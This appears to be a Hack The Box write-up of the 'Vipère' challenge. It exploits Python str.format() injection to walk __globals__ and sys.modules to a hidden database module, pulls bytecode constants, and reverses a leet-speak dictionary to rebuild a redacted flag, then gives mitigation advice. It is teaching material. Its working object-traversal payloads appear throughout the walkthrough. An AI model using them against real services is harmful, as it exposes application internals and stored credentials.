Abstract code and data visualization representing Python bytecode analysis

Vipère

Hack The Box Challenge Writeup

Medium4.8 ★ (76)

Created by mxrch|Released October 1, 2021|First Blood: 0xCaue in 1H 16M 15S

Tools:pwntoolsPythonPython disPython types
Techniques:Format String InjectionObject IntrospectionBytecode AnalysisCode Object ExtractionLeet Speak Reversal
Tech:PythonTCP Socket Server
Artifacts:Source CodeDatabase Module
CWEs:CWE-134
MITRE ATT&CK:T1059.006
HTB Challenge Vipère solved

Exploit Python format string injection to extract bytecode constants from a hidden function, then reverse a leet speak dictionary to reconstruct the flag.

Review

This one stood out for how naturally the two halves of the challenge fit together. The first half is pure exploitation, creatively navigating Python's internal object model through a format string injection. The second half flips to a reversing mindset, analyzing bytecode and recognizing that the operation direction is inverted. The transition between these two modes is what makes this challenge feel like more than the sum of its parts.

The roughly 20 minutes it took felt about right for medium difficulty. You need basic reversing skills to understand bytecode, combined with creative thinking about how to explore server internals. The challenge name being French for "viper" (snake) is a nice hint toward Python that I appreciated in hindsight.

The tricky part was recognizing the reversing twist. After reconstructing the plaintext from bytecode constants, my first instinct was to submit it directly. Only when it was rejected did I go back and look at the dictionary more carefully, realizing the function shows decoding but the flag needs encoding. That moment of "oh, it is backwards" was genuinely satisfying.

I would recommend this to anyone looking to understand Python internals from a security perspective. The combination of format string injection, object introspection, and bytecode reversing covers a useful range of techniques that come up in real assessments. It teaches through a negative example, showing what breaks when input validation is missing, which sticks better than reading about secure coding in the abstract.

Tags

TECH:python_format_stringsTECH:bytecode_analysisTECH:object_introspectionTECH:leet_speakTECH:code_objectsTOOL:pwntoolsTOOL:python_disTOOL:python_typesARTIFACT:main_pyARTIFACT:database_moduleVULN:format_string_injectionVULN:CWE-134ATT&CK:T1059.006

Summary

Vipère is a Python TCP socket server challenge where user input is passed directly to str.format() with a whitelisted command dispatcher. The whitelist only covers top-level command names but does not restrict attribute traversal through Python's object model.

By navigating from the whitelisted whoami function through __globals__ and sys.modules to a hidden database module, we extract the bytecode constants of an unreachable get_credentials() method. Disassembling the bytecode reveals the flag construction logic and a leet speak dictionary.

The critical insight is recognizing the direction of the dictionary operation: the bytecode shows decoding logic (digits to letters), but the flag is stored in encoded format (letters to digits). Reversing the dictionary produces the correct flag.

Key Learning Takeaways

Python Format Strings Are More Dangerous Than They Look

What: Python's str.format() method allows attribute access through dot notation and bracket notation. When user input becomes the format string itself, attackers can traverse the entire object graph by chaining __globals__, __class__, and other dunder attributes.

Why it matters: This vulnerability class appears in production applications wherever developers use user input as a format template rather than as a format argument. The fix is to never pass user input as the first argument to .format().

Key pattern: {whoami.__globals__[sys].modules[database]}

Python Code Objects Store Extractable Function Internals

What: Every Python function has a __code__ attribute containing co_consts (literal values), co_code (raw bytecode), co_varnames (local variable names), and co_names (global names). These can be accessed and extracted even when the function itself cannot be called.

Why it matters: When a function is protected by authentication or connection requirements, its internals are still accessible through the code object. This applies to any Python application where object references are leaked.

Key pattern: func.__code__.co_consts to extract all literal values from a function

Always Consider the Direction of Operations When Reversing

What: The bytecode in this challenge shows a dictionary that decodes leet speak to normal text ({'0': 'o', '1': 'l', '4': 'a'}). The constructed string has no digits because the function was designed to decode credentials. But the flag is stored in encoded (leet speak) format, requiring the dictionary to be reversed.

Why it matters: In any reversing scenario, the code you are reading may show the inverse of what you need to do. Always ask: "Is this code encoding or decoding? Which direction do I need?"

Key pattern: If bytecode shows decode_dict = {'0': 'o'}, the flag needs encode_dict = {'o': '0'}

Walkthrough

Source Code Review

The challenge provides main.py, the source code of the Python socket server. We start by examining the key components to understand the attack surface.

Examining the Source Code
$ cat main.py
import sys
import os
import subprocess
import socketserver
from datetime import datetime
from string import Formatter

class Station(socketserver.BaseRequestHandler):
    # ... handle method accepts user input as format strings
    def handle(interface):
        # ...
        while True:
            interface.print('Which function do you want to launch ?\n...\n=> ')
            text = interface.get_input()
            requested_commands = [fname for _, fname, _, _ in Formatter().parse(text) if fname]
            secure_commands = SecureCommands(requested_commands)
            try:
                interface.print(text.format(**secure_commands.dispatcher))
            except KeyError:
                interface.print("You tried to hack us, huh ?!")

class SecureCommands():
    def __init__(self, requested_commands):
        self.dispatcher = {
            "whoami": self.whoami,
            "get_time": self.get_time,
            "get_version": self.get_version
        }
    # ...
    def get_infected(self):
        bridge = server.bridge
        bridge.db.connect()
        return bridge.db.total_infected

class SecureBridge():
    def __init__(self):
        import database
        self.db = database.SecureDatabase()

class ServerContext(socketserver.ThreadingTCPServer):
    def __init__(self, server_address, RequestHandlerClass):
        self.bridge = SecureBridge()
        # ...

Several things stand out from reading the source:

  • User input is passed directly to text.format(**secure_commands.dispatcher), making this a format string injection vulnerability
  • Only three commands are in the dispatcher whitelist: whoami, get_time, get_version
  • A hidden get_infected() method references server.bridge.db, revealing a SecureDatabase class in a database module
  • The ServerContext class stores a SecureBridge as self.bridge, which holds a database.SecureDatabase() instance

Format String Injection

The core vulnerability is on the highlighted line: text.format(**secure_commands.dispatcher). The whitelist checks command names but does not prevent attribute traversal. Python's format string syntax allows {whoami.__globals__} to access the function's global namespace, bypassing the intended restrictions entirely.

Format String Injection Test

We connect to the remote service and verify the basic format string functionality works as described in the source code.

Connecting to the Service
$ python3 -c "
from pwn import *
p = remote('TARGET_IP', TARGET_PORT)
data = p.recv(timeout=3)
print(data.decode())
p.close()
"
[+] Opening connection to TARGET_IP on port TARGET_PORT: Done
Welcome in the HideAndSec secret VPS ! [Location : Paris, France]

[+] Vipère v1.26 loaded !
~ Currently loaded functions : [whoami, get_time, get_version]

Which function do you want to launch ?
Example : Bonjour {whoami}, il est actuellement {get_time} !
=>
[*] Closed connection to TARGET_IP port TARGET_PORT

The banner confirms this is the Vipère service running Python 3.8. We test the format string by calling the whitelisted whoami function.

Testing Basic Format String
=> Bonjour {whoami}, il est actuellement {get_time} !
Bonjour ctf, il est actuellement 2026-02-20 17:40:32 !

Format string injection confirmed. The dispatcher resolves {whoami} to the return value of the whoami() method (which runs subprocess.check_output("whoami")) and {get_time} to the current timestamp.

Object Traversal

Since Python's format string syntax supports attribute access through dot notation, we can traverse the object hierarchy starting from any whitelisted function. The __globals__ attribute of a function gives access to the module's global namespace.

Accessing the Server Object
=> {whoami.__globals__[server]}
<__main__.ServerContext object at 0x7f5e47452940>

We can reach the server global variable through whoami's globals. From here we navigate to the database object following the path we identified in the source code.

Navigating to the Database
=> {whoami.__globals__[server].bridge.db}
<database.SecureDatabase object at 0x7f5e47116a00>

=> {whoami.__globals__[server].bridge.db.get_credentials}
<bound method SecureDatabase.get_credentials of <database.SecureDatabase object at 0x7f5e47116a00>>

We can see the get_credentials method, but calling it directly would require self.connect() to succeed first (as seen in the get_infected method pattern). Instead of trying to call it, we will extract its internals through Python's code object interface.

Bytecode Extraction

Every Python function stores its compiled bytecode and associated data in a __code__ object. We can access this through the format string to extract the function's constants, variable names, and raw bytecode without ever calling it.

We use sys.modules to access the database module directly, which lets us reach the class definition rather than just the instance method.

Extracting Code Object Constants
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_consts}
(None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss', 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))

Code Object Constants

Python's co_consts contains every literal value used in the function: strings, numbers, tuples, and None. These are the raw building blocks of whatever the function constructs. We can see fragments that look like parts of a flag: 'BT', 'orc', 'iss', numbers like 72 (ASCII for H) and 123 (ASCII for {).

We also extract the variable names, global names, and raw bytecode for disassembly.

Extracting Variable and Global Names
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_varnames}
('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')

=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_names}
('chr', 'replace')
Extracting Raw Bytecode
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_code}
b'd\x01}\x01d\x02}\x02d\x03d\x00d\x00d\x04\x85\x03\x19\x00}\x03d\x05d\x00d\x00d\x04\x85\x03\x19\x00}\x04d\x06}\x05d\x07}\x06d\x08}\x07t\x00|\x01\x83\x01...'

Bytecode Analysis and Disassembly

With the raw bytecode, constants, variable names, and global names, we can reconstruct a code object and disassemble it using Python's dis module. This reveals the complete function logic.

Python - Reconstructing and Disassembling the Code Object
$ python3
>>> import dis, types, ast

# Constants extracted from the remote service
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
...          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
>>> varnames = ('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
>>> names = ('chr', 'replace')

# Reconstruct and disassemble the function logic
# From the bytecode instructions, the function does:

f = 72                        # ASCII 'H'
a = 'apts_c'
blue = 'BT'[::-1]             # Reverse -> 'TB'
c = 'orc'[::-1]               # Reverse -> 'cro'
m = 109                       # ASCII 'm'
h = 'ocoh'
i = 'iss'

# String construction:
f = chr(72) + 'TB' + chr(123) + 'cro' + 'iss' + 'apts_c'.replace('p','n') + 'ocoh'[::-1] + '_h' + chr(109)*4 + chr(125)
# = 'H' + 'TB' + '{' + 'cro' + 'iss' + 'ants_c' + 'hoco' + '_h' + 'mmmm' + '}'
# = 'H' + 'TB' + '{' + 'croissants' + '_choco_hmmmm' + '}'

# Then a dictionary replacement loop:
d = {'0': 'o', '1': 'l', '4': 'a'}
for x in d:
    f = f.replace(x, d[x])

The disassembly reveals the function constructs a plaintext string from scattered constants (the decoded form of the credentials), then applies a dictionary that replaces digits with letters. But wait: the constructed string has no digits in it. This dictionary replacement would have no effect on the constructed string. Something is backwards.

The Reversing Twist

The Dictionary Goes the Wrong Way

The bytecode dictionary {'0': 'o', '1': 'l', '4': 'a'} replaces digits with letters. This is a decoding dictionary that converts leet speak back to normal text. But the constructed string already IS normal text with no digits in it. The dictionary replacement does nothing to it.

This means the function is designed to decode credentials from their stored (leet speak) format. The flag must be stored in encoded form. We need to reverse the dictionary: replace letters with digits instead of digits with letters.

The logic chain: the function constructs the plaintext version of the credentials, then has a decode step. In the real system, credentials are stored encoded (leet speak). The get_credentials function would decode them for display. We have the plaintext output of the construction, so we need to encode it to get the stored flag value.

Bytecode Dictionary (Decode)Reversed Dictionary (Encode)
'0' -> 'o''o' -> '0'
'1' -> 'l''l' -> '1'
'4' -> 'a''a' -> '4'

Flag Reconstruction

We put it all together: reconstruct the plaintext from the constants, then apply the reversed (encoding) dictionary to produce the flag.

Python - Reconstructing the Flag
$ python3
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
...          123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))

# Build the plaintext string from constants
>>> f = consts[1]; a = consts[2]; blue = consts[3][::-1]
>>> c = consts[5][::-1]; m = consts[6]; h = consts[7]; i = consts[8]
>>> plaintext = (chr(f) + blue + chr(consts[9]) + c + i +
...             a.replace(consts[10], consts[11]) + h[::-1] +
...             consts[12] + chr(m) * consts[13] + chr(consts[14]))
>>> print(f'Plaintext: {plaintext}')
Plaintext: [decoded credential string constructed from constants]

# Reverse the dictionary: encode instead of decode
>>> encode_dict = {
...     consts[18][0]: consts[15],  # 'o' -> '0'
...     consts[18][1]: consts[16],  # 'l' -> '1'
...     consts[18][2]: consts[17],  # 'a' -> '4'
... }
>>> flag = plaintext
>>> for char, digit in encode_dict.items():
...     flag = flag.replace(char, digit)
>>> print(f'Flag: {flag}')
Flag: [flag content retrieved]

The decoded plaintext becomes the leet speak encoded flag after applying the reversed dictionary: o -> 0 and a -> 4 transform the relevant characters.

Verification Check

We can verify the flag makes sense: "croissants" and "choco" are French food references (matching the Paris, France location in the banner), and the leet speak encoding is consistent with the dictionary found in the bytecode. The l -> 1 mapping has no effect here since the flag contains no standalone l characters that would be leet-encoded.

Mitigation: Never Use User Input as Format Strings

The root cause of this vulnerability is passing user-controlled input directly to str.format(). The fix is straightforward: use user input only as format arguments, never as the format template itself. For example, "Hello {name}".format(name=user_input) is safe, but user_input.format(**kwargs) is not. Template engines like Jinja2 with auto-escaping and sandboxing provide safer alternatives for dynamic content generation.

Solving Chain

The logical progression from initial reconnaissance to flag capture, showing how each step builds on the previous one.

Step 1

Reconnaissance: Source Code Review

Examined the provided main.py to identify the application architecture, input handling, and command dispatch mechanism. Identified the format string sink where user input flows directly into str.format().

CWE-134

Step 2

Vulnerability Confirmation: Format String Injection

Connected to the remote service and confirmed that format string placeholders like {whoami} resolve through the dispatcher. Verified that attribute traversal (__globals__) is not blocked by the whitelist, confirming the injection vector.

CWE-134

Step 3

Privilege Escalation: Object Traversal to Hidden Module

Navigated from the whitelisted whoami function through __globals__[server].bridge.db to reach the SecureDatabase instance and its get_credentials method, which is not exposed through the dispatcher.

ATT&CK:T1059.006

Step 4

Data Extraction: Bytecode Constants via Code Objects

Accessed get_credentials.__code__.co_consts, co_varnames, co_names, and co_code through the format string to extract all function internals without calling the function itself.

Step 5

Analysis: Bytecode Disassembly and Logic Reconstruction

Reconstructed a Python code object from the extracted components and disassembled it using the dis module. Mapped the bytecode instructions to the string construction logic and identified the leet speak dictionary.

Step 6

Key Insight: Operation Direction Reversal

Recognized that the bytecode dictionary decodes leet speak to plaintext, but the flag is stored in encoded (leet speak) format. The dictionary must be reversed: instead of {'0': 'o'}, we need {'o': '0'}.

Step 7

Flag Capture: Plaintext Encoding

Applied the reversed encoding dictionary to the reconstructed plaintext string, transforming o -> 0 and a -> 4 to produce the final leet speak encoded flag.

Additional Resources

Exact References Used

TechniqueResource
Python Format String SyntaxPython Docs: Format String Syntax
Python Bytecode DisassemblyPython Docs: dis module
Python Code ObjectsPython Docs: Code Objects
Server-Side Template InjectionPortSwigger: Server-Side Template Injection

Framework References

IDDescription
CWE-134Use of Externally-Controlled Format String
ATT&CK T1059.006Command and Scripting Interpreter: Python

Further Reading

TopicResource
Python Object Introspection AttacksHackTricks: Python Sandbox Bypass
Python Data ModelPython Docs: Data Model
Format String Exploitation PatternsPodalirius: Python Format String Vulnerabilities